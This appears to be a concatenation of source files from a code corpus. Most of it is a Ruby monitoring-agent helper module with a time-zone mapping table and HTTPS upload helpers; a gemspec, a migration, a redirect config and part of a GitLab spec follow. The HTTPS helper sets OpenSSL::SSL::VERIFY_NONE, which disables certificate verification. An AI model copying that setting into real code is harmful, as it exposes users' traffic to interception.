'Indian/Antananarivo' => 'E. Africa Standard Time',
'Africa/Khartoum' => 'E. Africa Standard Time',
'Africa/Mogadishu' => 'E. Africa Standard Time',
'Africa/Juba' => 'E. Africa Standard Time',
'Africa/Dar_es_Salaam' => 'E. Africa Standard Time',
'Africa/Kampala' => 'E. Africa Standard Time',
'Indian/Mayotte' => 'E. Africa Standard Time',
'Etc/GMT-3' => 'E. Africa Standard Time',
'Australia/Brisbane' => 'E. Australia Standard Time',
'Australia/Lindeman' => 'E. Australia Standard Time',
'Europe/Chisinau' => 'E. Europe Standard Time',
'America/Sao_Paulo' => 'E. South America Standard Time',
'America/New_York' => 'Eastern Standard Time',
'America/Nassau' => 'Eastern Standard Time',
'America/Toronto' => 'Eastern Standard Time',
'America/Iqaluit' => 'Eastern Standard Time',
'America/Montreal' => 'Eastern Standard Time',
'America/Nipigon' => 'Eastern Standard Time',
'America/Pangnirtung' => 'Eastern Standard Time',
'America/Thunder_Bay' => 'Eastern Standard Time',
'America/Havana' => 'Eastern Standard Time',
'America/Port-au-Prince' => 'Eastern Standard Time',
'America/Detroit' => 'Eastern Standard Time',
'America/Indiana/Petersburg' => 'Eastern Standard Time',
'America/Indiana/Vincennes' => 'Eastern Standard Time',
'America/Indiana/Winamac' => 'Eastern Standard Time',
'America/Kentucky/Monticello' => 'Eastern Standard Time',
'America/Louisville' => 'Eastern Standard Time',
'EST5EDT' => 'Eastern Standard Time',
'America/Cancun' => 'Eastern Standard Time (Mexico)',
'Africa/Cairo' => 'Egypt Standard Time',
'Asia/Gaza' => 'Egypt Standard Time',
'Asia/Hebron' => 'Egypt Standard Time',
'Asia/Yekaterinburg' => 'Ekaterinburg Standard Time',
'Europe/Kiev' => 'FLE Standard Time',
'Europe/Mariehamn' => 'FLE Standard Time',
'Europe/Sofia' => 'FLE Standard Time',
'Europe/Tallinn' => 'FLE Standard Time',
'Europe/Helsinki' => 'FLE Standard Time',
'Europe/Vilnius' => 'FLE Standard Time',
'Europe/Riga' => 'FLE Standard Time',
'Europe/Uzhgorod' => 'FLE Standard Time',
'Europe/Zaporozhye' => 'FLE Standard Time',
'Pacific/Fiji' => 'Fiji Standard Time',
'Europe/London' => 'GMT Standard Time',
'Atlantic/Canary' => 'GMT Standard Time',
'Atlantic/Faeroe' => 'GMT Standard Time',
'Europe/Guernsey' => 'GMT Standard Time',
'Europe/Dublin' => 'GMT Standard Time',
'Europe/Isle_of_Man' => 'GMT Standard Time',
'Europe/Jersey' => 'GMT Standard Time',
'Europe/Lisbon' => 'GMT Standard Time',
'Atlantic/Madeira' => 'GMT Standard Time',
'Europe/Bucharest' => 'GTB Standard Time',
'Asia/Nicosia' => 'GTB Standard Time',
'Europe/Athens' => 'GTB Standard Time',
'Asia/Tbilisi' => 'Georgian Standard Time',
'America/Godthab' => 'Greenland Standard Time',
'Atlantic/Reykjavik' => 'Greenwich Standard Time',
'Africa/Ouagadougou' => 'Greenwich Standard Time',
'Africa/Abidjan' => 'Greenwich Standard Time',
'Africa/Accra' => 'Greenwich Standard Time',
'Africa/Banjul' => 'Greenwich Standard Time',
'Africa/Conakry' => 'Greenwich Standard Time',
'Africa/Bissau' => 'Greenwich Standard Time',
'Africa/Monrovia' => 'Greenwich Standard Time',
'Africa/Bamako' => 'Greenwich Standard Time',
'Africa/Nouakchott' => 'Greenwich Standard Time',
'Atlantic/St_Helena' => 'Greenwich Standard Time',
'Africa/Freetown' => 'Greenwich Standard Time',
'Africa/Dakar' => 'Greenwich Standard Time',
'Africa/Sao_Tome' => 'Greenwich Standard Time',
'Africa/Lome' => 'Greenwich Standard Time',
'Pacific/Honolulu' => 'Hawaiian Standard Time',
'Pacific/Rarotonga' => 'Hawaiian Standard Time',
'Pacific/Tahiti' => 'Hawaiian Standard Time',
'Pacific/Johnston' => 'Hawaiian Standard Time',
'Etc/GMT+10' => 'Hawaiian Standard Time',
'Asia/Calcutta' => 'India Standard Time',
'Asia/Tehran' => 'Iran Standard Time',
'Asia/Jerusalem' => 'Israel Standard Time',
'Asia/Amman' => 'Jordan Standard Time',
'Europe/Kaliningrad' => 'Kaliningrad Standard Time',
'Asia/Seoul' => 'Korea Standard Time',
'Africa/Tripoli' => 'Libya Standard Time',
'Pacific/Kiritimati' => 'Line Islands Standard Time',
'Etc/GMT-14' => 'Line Islands Standard Time',
'Asia/Magadan' => 'Magadan Standard Time',
'Indian/Mauritius' => 'Mauritius Standard Time',
'Indian/Reunion' => 'Mauritius Standard Time',
'Indian/Mahe' => 'Mauritius Standard Time',
'Asia/Beirut' => 'Middle East Standard Time',
'America/Montevideo' => 'Montevideo Standard Time',
'Africa/Casablanca' => 'Morocco Standard Time',
'Africa/El_Aaiun' => 'Morocco Standard Time',
'America/Denver' => 'Mountain Standard Time',
'America/Edmonton' => 'Mountain Standard Time',
'America/Cambridge_Bay' => 'Mountain Standard Time',
'America/Inuvik' => 'Mountain Standard Time',
'America/Yellowknife' => 'Mountain Standard Time',
'America/Ojinaga' => 'Mountain Standard Time',
'America/Boise' => 'Mountain Standard Time',
'MST7MDT' => 'Mountain Standard Time',
'America/Chihuahua' => 'Mountain Standard Time (Mexico)',
'America/Mazatlan' => 'Mountain Standard Time (Mexico)',
'Asia/Rangoon' => 'Myanmar Standard Time',
'Indian/Cocos' => 'Myanmar Standard Time',
'Asia/Novosibirsk' => 'N. Central Asia Standard Time',
'Asia/Omsk' => 'N. Central Asia Standard Time',
'Africa/Windhoek' => 'Namibia Standard Time',
'Asia/Katmandu' => 'Nepal Standard Time',
'Pacific/Auckland' => 'New Zealand Standard Time',
'Antarctica/McMurdo' => 'New Zealand Standard Time',
'America/St_Johns' => 'Newfoundland Standard Time',
'Asia/Irkutsk' => 'North Asia East Standard Time',
'Asia/Krasnoyarsk' => 'North Asia Standard Time',
'Asia/Novokuznetsk' => 'North Asia Standard Time',
'Asia/Pyongyang' => 'North Korea Standard Time',
'America/Santiago' => 'Pacific SA Standard Time',
'Antarctica/Palmer' => 'Pacific SA Standard Time',
'America/Los_Angeles' => 'Pacific Standard Time',
'America/Vancouver' => 'Pacific Standard Time',
'America/Dawson' => 'Pacific Standard Time',
'America/Whitehorse' => 'Pacific Standard Time',
'America/Tijuana' => 'Pacific Standard Time',
'America/Santa_Isabel' => 'Pacific Standard Time',
'PST8PDT' => 'Pacific Standard Time',
'Asia/Karachi' => 'Pakistan Standard Time',
'America/Asuncion' => 'Paraguay Standard Time',
'Europe/Paris' => 'Romance Standard Time',
'Europe/Brussels' => 'Romance Standard Time',
'Europe/Copenhagen' => 'Romance Standard Time',
'Europe/Madrid' => 'Romance Standard Time',
'Africa/Ceuta' => 'Romance Standard Time',
'Asia/Srednekolymsk' => 'Russia Time Zone 10',
'Asia/Kamchatka' => 'Russia Time Zone 11',
'Asia/Anadyr' => 'Russia Time Zone 11',
'Europe/Samara' => 'Russia Time Zone 3',
'Europe/Moscow' => 'Russian Standard Time',
'Europe/Simferopol' => 'Russian Standard Time',
'Europe/Volgograd' => 'Russian Standard Time',
'America/Cayenne' => 'SA Eastern Standard Time',
'Antarctica/Rothera' => 'SA Eastern Standard Time',
'America/Fortaleza' => 'SA Eastern Standard Time',
'America/Araguaina' => 'SA Eastern Standard Time',
'America/Belem' => 'SA Eastern Standard Time',
'America/Maceio' => 'SA Eastern Standard Time',
'America/Recife' => 'SA Eastern Standard Time',
'America/Santarem' => 'SA Eastern Standard Time',
'Atlantic/Stanley' => 'SA Eastern Standard Time',
'America/Paramaribo' => 'SA Eastern Standard Time',
'Etc/GMT+3' => 'SA Eastern Standard Time',
'America/Bogota' => 'SA Pacific Standard Time',
'America/Rio_Branco' => 'SA Pacific Standard Time',
'America/Eirunepe' => 'SA Pacific Standard Time',
'America/Coral_Harbour' => 'SA Pacific Standard Time',
'Pacific/Easter' => 'SA Pacific Standard Time',
'America/Guayaquil' => 'SA Pacific Standard Time',
'America/Jamaica' => 'SA Pacific Standard Time',
'America/Cayman' => 'SA Pacific Standard Time',
'America/Panama' => 'SA Pacific Standard Time',
'America/Lima' => 'SA Pacific Standard Time',
'Etc/GMT+5' => 'SA Pacific Standard Time',
'America/La_Paz' => 'SA Western Standard Time',
'America/Antigua' => 'SA Western Standard Time',
'America/Anguilla' => 'SA Western Standard Time',
'America/Aruba' => 'SA Western Standard Time',
'America/Barbados' => 'SA Western Standard Time',
'America/St_Barthelemy' => 'SA Western Standard Time',
'America/Kralendijk' => 'SA Western Standard Time',
'America/Manaus' => 'SA Western Standard Time',
'America/Boa_Vista' => 'SA Western Standard Time',
'America/Porto_Velho' => 'SA Western Standard Time',
'America/Blanc-Sablon' => 'SA Western Standard Time',
'America/Curacao' => 'SA Western Standard Time',
'America/Dominica' => 'SA Western Standard Time',
'America/Santo_Domingo' => 'SA Western Standard Time',
'America/Grenada' => 'SA Western Standard Time',
'America/Guadeloupe' => 'SA Western Standard Time',
'America/Guyana' => 'SA Western Standard Time',
'America/St_Kitts' => 'SA Western Standard Time',
'America/St_Lucia' => 'SA Western Standard Time',
'America/Marigot' => 'SA Western Standard Time',
'America/Martinique' => 'SA Western Standard Time',
'America/Montserrat' => 'SA Western Standard Time',
'America/Puerto_Rico' => 'SA Western Standard Time',
'America/Lower_Princes' => 'SA Western Standard Time',
'America/Grand_Turk' => 'SA Western Standard Time',
'America/Port_of_Spain' => 'SA Western Standard Time',
'America/St_Vincent' => 'SA Western Standard Time',
'America/Tortola' => 'SA Western Standard Time',
'America/St_Thomas' => 'SA Western Standard Time',
'Etc/GMT+4' => 'SA Western Standard Time',
'Asia/Bangkok' => 'SE Asia Standard Time',
'Antarctica/Davis' => 'SE Asia Standard Time',
'Indian/Christmas' => 'SE Asia Standard Time',
'Asia/Jakarta' => 'SE Asia Standard Time',
'Asia/Pontianak' => 'SE Asia Standard Time',
'Asia/Phnom_Penh' => 'SE Asia Standard Time',
'Asia/Vientiane' => 'SE Asia Standard Time',
'Asia/Hovd' => 'SE Asia Standard Time',
'Asia/Saigon' => 'SE Asia Standard Time',
'Etc/GMT-7' => 'SE Asia Standard Time',
'Pacific/Apia' => 'Samoa Standard Time',
'Asia/Singapore' => 'Singapore Standard Time',
'Asia/Brunei' => 'Singapore Standard Time',
'Asia/Makassar' => 'Singapore Standard Time',
'Asia/Kuala_Lumpur' => 'Singapore Standard Time',
'Asia/Kuching' => 'Singapore Standard Time',
'Asia/Manila' => 'Singapore Standard Time',
'Etc/GMT-8' => 'Singapore Standard Time',
'Africa/Johannesburg' => 'South Africa Standard Time',
'Africa/Bujumbura' => 'South Africa Standard Time',
'Africa/Gaborone' => 'South Africa Standard Time',
'Africa/Lubumbashi' => 'South Africa Standard Time',
'Africa/Maseru' => 'South Africa Standard Time',
'Africa/Blantyre' => 'South Africa Standard Time',
'Africa/Maputo' => 'South Africa Standard Time',
'Africa/Kigali' => 'South Africa Standard Time',
'Africa/Mbabane' => 'South Africa Standard Time',
'Africa/Lusaka' => 'South Africa Standard Time',
'Africa/Harare' => 'South Africa Standard Time',
'Etc/GMT-2' => 'South Africa Standard Time',
'Asia/Colombo' => 'Sri Lanka Standard Time',
'Asia/Damascus' => 'Syria Standard Time',
'Asia/Taipei' => 'Taipei Standard Time',
'Australia/Hobart' => 'Tasmania Standard Time',
'Australia/Currie' => 'Tasmania Standard Time',
'Asia/Tokyo' => 'Tokyo Standard Time',
'Asia/Jayapura' => 'Tokyo Standard Time',
'Pacific/Palau' => 'Tokyo Standard Time',
'Asia/Dili' => 'Tokyo Standard Time',
'Etc/GMT-9' => 'Tokyo Standard Time',
'Pacific/Tongatapu' => 'Tonga Standard Time',
'Pacific/Enderbury' => 'Tonga Standard Time',
'Pacific/Fakaofo' => 'Tonga Standard Time',
'Etc/GMT-13' => 'Tonga Standard Time',
'Europe/Istanbul' => 'Turkey Standard Time',
'America/Indianapolis' => 'US Eastern Standard Time',
'America/Indiana/Marengo' => 'US Eastern Standard Time',
'America/Indiana/Vevay' => 'US Eastern Standard Time',
'America/Phoenix' => 'US Mountain Standard Time',
'America/Dawson_Creek' => 'US Mountain Standard Time',
'America/Creston' => 'US Mountain Standard Time',
'America/Fort_Nelson' => 'US Mountain Standard Time',
'America/Hermosillo' => 'US Mountain Standard Time',
'Etc/GMT+7' => 'US Mountain Standard Time',
'Etc/GMT' => 'UTC',
'Etc/UTC' => 'UTC',
'America/Danmarkshavn' => 'UTC',
'Etc/GMT-12' => 'UTC+12',
'Pacific/Tarawa' => 'UTC+12',
'Pacific/Majuro' => 'UTC+12',
'Pacific/Kwajalein' => 'UTC+12',
'Pacific/Nauru' => 'UTC+12',
'Pacific/Funafuti' => 'UTC+12',
'Pacific/Wake' => 'UTC+12',
'Pacific/Wallis' => 'UTC+12',
'Etc/GMT+2' => 'UTC-02',
'America/Noronha' => 'UTC-02',
'Atlantic/South_Georgia' => 'UTC-02',
'Etc/GMT+11' => 'UTC-11',
'Pacific/Pago_Pago' => 'UTC-11',
'Pacific/Niue' => 'UTC-11',
'Pacific/Midway' => 'UTC-11',
'Asia/Ulaanbaatar' => 'Ulaanbaatar Standard Time',
'Asia/Choibalsan' => 'Ulaanbaatar Standard Time',
'America/Caracas' => 'Venezuela Standard Time',
'Asia/Vladivostok' => 'Vladivostok Standard Time',
'Asia/Sakhalin' => 'Vladivostok Standard Time',
'Asia/Ust-Nera' => 'Vladivostok Standard Time',
'Australia/Perth' => 'W. Australia Standard Time',
'Antarctica/Casey' => 'W. Australia Standard Time',
'Africa/Lagos' => 'W. Central Africa Standard Time',
'Africa/Luanda' => 'W. Central Africa Standard Time',
'Africa/Porto-Novo' => 'W. Central Africa Standard Time',
'Africa/Kinshasa' => 'W. Central Africa Standard Time',
'Africa/Bangui' => 'W. Central Africa Standard Time',
'Africa/Brazzaville' => 'W. Central Africa Standard Time',
'Africa/Douala' => 'W. Central Africa Standard Time',
'Africa/Algiers' => 'W. Central Africa Standard Time',
'Africa/Libreville' => 'W. Central Africa Standard Time',
'Africa/Malabo' => 'W. Central Africa Standard Time',
'Africa/Niamey' => 'W. Central Africa Standard Time',
'Africa/Ndjamena' => 'W. Central Africa Standard Time',
'Africa/Tunis' => 'W. Central Africa Standard Time',
'Etc/GMT-1' => 'W. Central Africa Standard Time',
'Europe/Berlin' => 'W. Europe Standard Time',
'Europe/Andorra' => 'W. Europe Standard Time',
'Europe/Vienna' => 'W. Europe Standard Time',
'Europe/Zurich' => 'W. Europe Standard Time',
'Europe/Busingen' => 'W. Europe Standard Time',
'Europe/Gibraltar' => 'W. Europe Standard Time',
'Europe/Rome' => 'W. Europe Standard Time',
'Europe/Vaduz' => 'W. Europe Standard Time',
'Europe/Luxembourg' => 'W. Europe Standard Time',
'Europe/Monaco' => 'W. Europe Standard Time',
'Europe/Malta' => 'W. Europe Standard Time',
'Europe/Amsterdam' => 'W. Europe Standard Time',
'Europe/Oslo' => 'W. Europe Standard Time',
'Europe/Stockholm' => 'W. Europe Standard Time',
'Arctic/Longyearbyen' => 'W. Europe Standard Time',
'Europe/San_Marino' => 'W. Europe Standard Time',
'Europe/Vatican' => 'W. Europe Standard Time',
'Asia/Tashkent' => 'West Asia Standard Time',
'Antarctica/Mawson' => 'West Asia Standard Time',
'Asia/Oral' => 'West Asia Standard Time',
'Asia/Aqtau' => 'West Asia Standard Time',
'Asia/Aqtobe' => 'West Asia Standard Time',
'Indian/Maldives' => 'West Asia Standard Time',
'Indian/Kerguelen' => 'West Asia Standard Time',
'Asia/Dushanbe' => 'West Asia Standard Time',
'Asia/Ashgabat' => 'West Asia Standard Time',
'Asia/Samarkand' => 'West Asia Standard Time',
'Etc/GMT-5' => 'West Asia Standard Time',
'Pacific/Port_Moresby' => 'West Pacific Standard Time',
'Antarctica/DumontDUrville' => 'West Pacific Standard Time',
'Pacific/Truk' => 'West Pacific Standard Time',
'Pacific/Guam' => 'West Pacific Standard Time',
'Pacific/Saipan' => 'West Pacific Standard Time',
'Etc/GMT-10' => 'West Pacific Standard Time',
'Asia/Yakutsk' => 'Yakutsk Standard Time',
'Asia/Chita' => 'Yakutsk Standard Time',
'Asia/Khandyga' => 'Yakutsk Standard Time'
}
@@tzLocalTimePath = '/etc/localtime'
@@tzBaseFolder = '/usr/share/zoneinfo/'
@@tzRightFolder = 'right/'
class << self
# get the unified timezone id by absolute file path of the timezone file
# file path: the absolute path of the file
def get_unified_timezoneid(filepath)
# remove the baseFolder path
tzID = filepath[@@tzBaseFolder.length..-1] if filepath.start_with?(@@tzBaseFolder)
return 'Unknown' if tzID.nil?
# if the rest starts with 'right/', remove it to unify the format
tzID = tzID[@@tzRightFolder.length..-1] if tzID.start_with?(@@tzRightFolder)
return tzID
end # end get_unified_timezoneid
def get_current_timezone
return @@CurrentTimeZone if !@@CurrentTimeZone.nil?
tzID = 'Unknown'
begin
# if /etc/localtime is a symlink, check the link file's path
if File.symlink?(@@tzLocalTimePath)
symlinkpath = File.absolute_path(File.readlink(@@tzLocalTimePath), File.dirname(@@tzLocalTimePath))
tzID = get_unified_timezoneid(symlinkpath)
# look for the entry in the timezone mapping
if @@tzMapping.has_key?(tzID)
@@CurrentTimeZone = @@tzMapping[tzID]
return @@CurrentTimeZone
end
end
# calculate the md5 of /etc/locatime
md5sum = Digest::MD5.file(@@tzLocalTimePath).hexdigest
# looks for a file in the /usr/share/zoneinfo/, which is identical to /etc/localtime. use the file name as the timezone
Dir.glob("#{@@tzBaseFolder}**/*") { |filepath|
# find all the files whose md5 is the same as the /etc/localtime
if File.file? filepath and Digest::MD5.file(filepath).hexdigest == md5sum
tzID = get_unified_timezoneid(filepath)
# look for the entry in the timezone mapping
if @@tzMapping.has_key?(tzID)
@@CurrentTimeZone = @@tzMapping[tzID]
return @@CurrentTimeZone
end
end
}
rescue => error
Log.error_once("Unable to get the current time zone: #{error}")
end
# assign the tzID if the corresponding Windows Time Zone is not found
@@CurrentTimeZone = tzID if @@CurrentTimeZone.nil?
return @@CurrentTimeZone
end # end get_current_timezone
def get_os_full_name(conf_path = "/etc/opt/microsoft/scx/conf/scx-release")
return @@OSFullName if !@@OSFullName.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
os_full_name = conf[/OSFullName=(.*?)\n/, 1]
if os_full_name and os_full_name.size
@@OSFullName = os_full_name
end
end
return @@OSFullName
end
def get_os_name(conf_path = "/etc/opt/microsoft/scx/conf/scx-release")
return @@OSName if !@@OSName.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
os_name = conf[/OSName=(.*?)\n/, 1]
if os_name and os_name.size
@@OSName = os_name
end
end
return @@OSName
end
def get_os_version(conf_path = "/etc/opt/microsoft/scx/conf/scx-release")
return @@OSVersion if !@@OSVersion.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
os_version = conf[/OSVersion=(.*?)\n/, 1]
if os_version and os_version.size
@@OSVersion = os_version
end
end
return @@OSVersion
end
def get_hostname
return @@Hostname if !@@Hostname.nil?
begin
hostname = Socket.gethostname.split(".")[0]
rescue => error
Log.error_once("Unable to get the Host Name: #{error}")
else
@@Hostname = hostname
end
return @@Hostname
end
def get_fully_qualified_domain_name
return @@FQDN unless @@FQDN.nil?
begin
fqdn = Socket.gethostbyname(Socket.gethostname)[0]
rescue => error
Log.error_once("Unable to get the FQDN: #{error}")
else
@@FQDN = fqdn
end
return @@FQDN
end
def get_installed_date(conf_path = "/etc/opt/microsoft/omsagent/sysconf/installinfo.txt")
return @@InstalledDate if !@@InstalledDate.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
installed_date = conf[/(.*)\n(.*)/, 2]
if installed_date and installed_date.size
begin
Time.parse(installed_date)
rescue ArgumentError
Log.error_once("Invalid install date: #{installed_date}")
else
@@InstalledDate = installed_date
end
end
end
return @@InstalledDate
end
def get_agent_version(conf_path = "/etc/opt/microsoft/omsagent/sysconf/installinfo.txt")
return @@AgentVersion if !@@AgentVersion.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
agent_version = conf[/([\d]+\.[\d]+\.[\d]+-[\d]+)\s.*\n/, 1]
if agent_version and agent_version.size
@@AgentVersion = agent_version
end
end
return @@AgentVersion
end
def format_time(time)
Time.at(time).utc.iso8601(3) # UTC with milliseconds
end
def format_time_str(time)
DateTime.parse(time).strftime("%FT%H:%M:%S.%3NZ")
end
def create_error_tag(tag)
"ERROR::#{tag}::"
end
# create an HTTP object which uses HTTPS
def create_secure_http(uri, proxy={})
if proxy.empty?
http = Net::HTTP.new( uri.host, uri.port )
else
http = Net::HTTP.new( uri.host, uri.port,
proxy[:addr], proxy[:port], proxy[:user], proxy[:pass])
end
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
http.open_timeout = 30
return http
end # create_secure_http
# create an HTTP object to ODS
def create_ods_http(ods_uri, proxy={})
http = create_secure_http(ods_uri, proxy)
http.cert = Configuration.cert
http.key = Configuration.key
return http
end # create_ods_http
# create an HTTPRequest object to ODS
# parameters:
# path: string. path of the request
# record: Hash. body of the request
# compress: bool. Whether the body of the request should be compressed
# extra_header: Hash. extra HTTP headers
# serializer: method. serializer of the record
# returns:
# HTTPRequest. request to ODS
def create_ods_request(path, record, compress, extra_headers=nil, serializer=method(:parse_json_record_encoding))
headers = extra_headers.nil? ? {} : extra_headers
azure_resource_id = OMS::Configuration.azure_resource_id
if !azure_resource_id.to_s.empty?
headers[OMS::CaseSensitiveString.new("x-ms-AzureResourceId")] = azure_resource_id
end
omscloud_id = OMS::Configuration.omscloud_id
if !omscloud_id.to_s.empty?
headers[OMS::CaseSensitiveString.new("x-ms-OMSCloudId")] = omscloud_id
end
uuid = OMS::Configuration.uuid
if !uuid.to_s.empty?
headers[OMS::CaseSensitiveString.new("x-ms-UUID")] = uuid
end
headers[OMS::CaseSensitiveString.new("X-Request-ID")] = SecureRandom.uuid
headers["Content-Type"] = "application/json"
if compress == true
headers["Content-Encoding"] = "deflate"
end
req = Net::HTTP::Post.new(path, headers)
json_msg = serializer.call(record)
if json_msg.nil?
return nil
else
if compress == true
req.body = Zlib::Deflate.deflate(json_msg)
else
req.body = json_msg
end
end
return req
end # create_ods_request
# parses the json record with appropriate encoding
# parameters:
# record: Hash. body of the request
# returns:
# json represention of object,
# nil if encoding cannot be applied
def parse_json_record_encoding(record)
msg = nil
begin
msg = JSON.dump(record)
rescue => error
# failed encoding, encode to utf-8, iso-8859-1 and try again
begin
if !record["DataItems"].nil?
record["DataItems"].each do |item|
item["Message"] = item["Message"].encode('utf-8', 'iso-8859-1')
end
end
msg = JSON.dump(record)
rescue => error
# at this point we've given up up, we don't recognize
# the encode, so return nil and log_warning for the
# record
Log.warn_once("Skipping due to failed encoding for #{record}: #{error}")
end
end
return msg
end
# dump the records into json string
# assume the records is an array of single layer hash
# return nil if we cannot dump it
# parameters:
# records: hash[]. an array of single layer hash
def safe_dump_simple_hash_array(records)
msg = nil
begin
msg = JSON.dump(records)
rescue JSON::GeneratorError => error
Log.warn_once("Unable to dump to JSON string. #{error}")
begin
# failed to dump, encode to utf-8, iso-8859-1 and try again
# records is an array of hash
records.each do | hash |
# the value is a hash
hash.each do | key, value |
# the value should be of simple type
# encode the string to utf-8
if value.instance_of? String
hash[key] = value.encode('utf-8', 'iso-8859-1')
end
end
end
msg = JSON.dump(records)
rescue => error
# at this point we've given up, we don't recognize the encode,
# so return nil and log_warning for the record
Log.warn_once("Skipping due to failed encoding for #{records}: #{error}")
end
rescue => error
# unexpected error when dumpping the records into JSON string
# skip here and return nil
Log.warn_once("Skipping due to unexpected error for #{records}: #{error}")
end
return msg
end # safe_dump_simple_hash_array
# start a request
# parameters:
# req: HTTPRequest. request
# secure_http: HTTP. HTTPS
# ignore404: bool. ignore the 404 error when it's true
# returns:
# string. body of the response
def start_request(req, secure_http, ignore404 = false)
# Tries to send the passed in request
# Raises an exception if the request fails.
# This exception should only be caught by the fluentd engine so that it retries sending this
begin
res = nil
res = secure_http.start { |http| http.request(req) }
rescue => e # rescue all StandardErrors
# Server didn't respond
raise RetryRequestException, "Net::HTTP.#{req.method.capitalize} raises exception: #{e.class}, '#{e.message}'"
else
if res.nil?
raise RetryRequestException, "Failed to #{req.method} at #{req.to_s} (res=nil)"
end
if res.is_a?(Net::HTTPSuccess)
return res.body
end
if ignore404 and res.code == "404"
return ''
end
if res.code != "200"
# Retry all failure error codes...
res_summary = "(request-id=#{req["X-Request-ID"]}; class=#{res.class.name}; code=#{res.code}; message=#{res.message}; body=#{res.body};)"
Log.error_once("HTTP Error: #{res_summary}")
raise RetryRequestException, "HTTP error: #{res_summary}"
end
end # end begin
end # end start_request
end # Class methods
end # class Common
# Small DNS cache: resolves hostnames to IPs on demand and has a background
# thread flush all entries every refresh_interval_seconds.
class IPcache
  def initialize(refresh_interval_seconds)
    @cache = {}
    @cache_lock = Mutex.new
    @refresh_interval_seconds = refresh_interval_seconds
    @condition = ConditionVariable.new
    # Background flusher; runs for the life of the process (never joined).
    @thread = Thread.new(&method(:refresh_cache))
  end
  # Return the cached IP for hostname, resolving (and caching) it on a miss.
  # Note that a failed resolution is cached as nil until the next flush.
  def get_ip(hostname)
    @cache_lock.synchronize {
      if @cache.has_key?(hostname)
        return @cache[hostname]
      else
        ip = get_ip_from_socket(hostname)
        @cache[hostname] = ip
        return ip
      end
    }
  end
  private
  # Resolve hostname via getaddrinfo and return the first numeric address,
  # or nil when resolution fails or yields no results (the "echo" service
  # argument only satisfies the API; only the address field [3] is used).
  def get_ip_from_socket(hostname)
    begin
      addrinfos = Socket::getaddrinfo(hostname, "echo", Socket::AF_UNSPEC)
    rescue => error
      Log.error_once("Unable to resolve the IP of '#{hostname}': #{error}")
      return nil
    end
    if addrinfos.size >= 1
      return addrinfos[0][3]
    end
    return nil
  end
  # Loop forever, emptying the cache every @refresh_interval_seconds (or
  # sooner if @condition is signaled).
  def refresh_cache
    while true
      @cache_lock.synchronize {
        @condition.wait(@cache_lock, @refresh_interval_seconds)
        # Flush the cache completely to prevent it from growing indefinitely
        @cache = {}
      }
    end
  end
end
# String subclass whose case-folding methods are deliberate no-ops, used for
# the x-ms-* / X-Request-ID header names built in create_ods_request so their
# exact casing is preserved.
class CaseSensitiveString < String
  # Both transformations intentionally return the receiver unchanged.
  %i[downcase capitalize].each do |transformation|
    define_method(transformation) { self }
  end
end
end # module OMS
| 42.455668 | 149 | 0.612271 |
032fd765bf9b06ff402cc93c9607c7f32ae11394 | 1,317 | # frozen_string_literal: true
require_relative 'lib/riot_games_api_client/version'
Gem::Specification.new do |spec|
  spec.name = 'riot_games_api_client'
  spec.version = RiotGamesApiClient::VERSION
  spec.authors = ['Ryo Nakamura']
  spec.email = ['[email protected]']
  spec.summary = 'Riot Games API client.'
  spec.homepage = 'https://github.com/r7kamura/riot_games_api_client'
  spec.license = 'MIT'
  spec.required_ruby_version = Gem::Requirement.new('>= 2.5.0')
  # Fix: this was still the generated "TODO: Set to 'http://mygemserver.com'"
  # placeholder, which blocks `gem push` with a confusing host error. The gem
  # is MIT-licensed and public, so allow pushes to the public gem server.
  spec.metadata['allowed_push_host'] = 'https://rubygems.org'
  spec.metadata['homepage_uri'] = spec.homepage
  spec.metadata['source_code_uri'] = spec.homepage
  spec.metadata['changelog_uri'] = "#{spec.homepage}/blob/master/CHANGELOG.md"
  # Specify which files should be added to the gem when it is released.
  # The `git ls-files -z` loads the files in the RubyGem that have been added into git.
  spec.files = Dir.chdir(File.expand_path(__dir__)) do
    `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
  end
  spec.bindir = 'exe'
  spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
  spec.require_paths = ['lib']
  spec.add_runtime_dependency 'faraday'
  spec.add_runtime_dependency 'faraday_middleware'
end
| 38.735294 | 87 | 0.690205 |
f7faa2147f80a7391d4e9354a60f6c650fb7bcc5 | 147 | class RemoveEncyclopaediaEntryIdFromTaggings < ActiveRecord::Migration
def change
remove_column :taggings, :encyclopaedia_entry_id
end
end
| 24.5 | 70 | 0.829932 |
3371a8c02ea2cbd53577cbad169b3e392040eafe | 965 | #Licensed to the Apache Software Foundation (ASF) under one or more
#contributor license agreements. See the NOTICE file distributed with
#this work for additional information regarding copyright ownership.
#The ASF licenses this file to You under the Apache License, Version 2.0
#(the "License"); you may not use this file except in compliance with
#the License. You may obtain a copy of the License at
#
#http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
#express or implied. See the License for the specific language governing
#permissions and limitations under the License.
# 301-redirect javadoc requests for the latest release to the project site,
# carrying the remainder of the matched path through as $1.
r301 %r{/releases/latest/javadoc/(.*)}, 'http://geode.apache.org/releases/latest/javadoc/$1'
# Serve the user guide's "About Geode" page for both the site root and index.
rewrite '/', '/docs/guide/113/about_geode.html'
rewrite '/index.html', '/docs/guide/113/about_geode.html'
| 50.789474 | 92 | 0.777202 |
21a227335cd232e2b445694cd58e2757320dc7c7 | 1,545 | require 'spec_helper'
# Specs for the web-upload after-export strategy: validation of its options
# and the behavior of #execute on success and on upload failure.
describe Gitlab::ImportExport::AfterExportStrategies::WebUploadStrategy do
  include StubRequests
  let(:example_url) { 'http://www.example.com' }
  let(:strategy) { subject.new(url: example_url, http_method: 'post') }
  let!(:project) { create(:project, :with_export) }
  let!(:user) { build(:user) }
  subject { described_class }
  describe 'validations' do
    it 'only POST and PUT method allowed' do
      %w(POST post PUT put).each do |method|
        expect(subject.new(url: example_url, http_method: method)).to be_valid
      end
      expect(subject.new(url: example_url, http_method: 'whatever')).not_to be_valid
    end
    # Fix: example description had a typo ('onyl allow urls').
    it 'only allows urls as upload urls' do
      expect(subject.new(url: example_url)).to be_valid
      expect(subject.new(url: 'whatever')).not_to be_valid
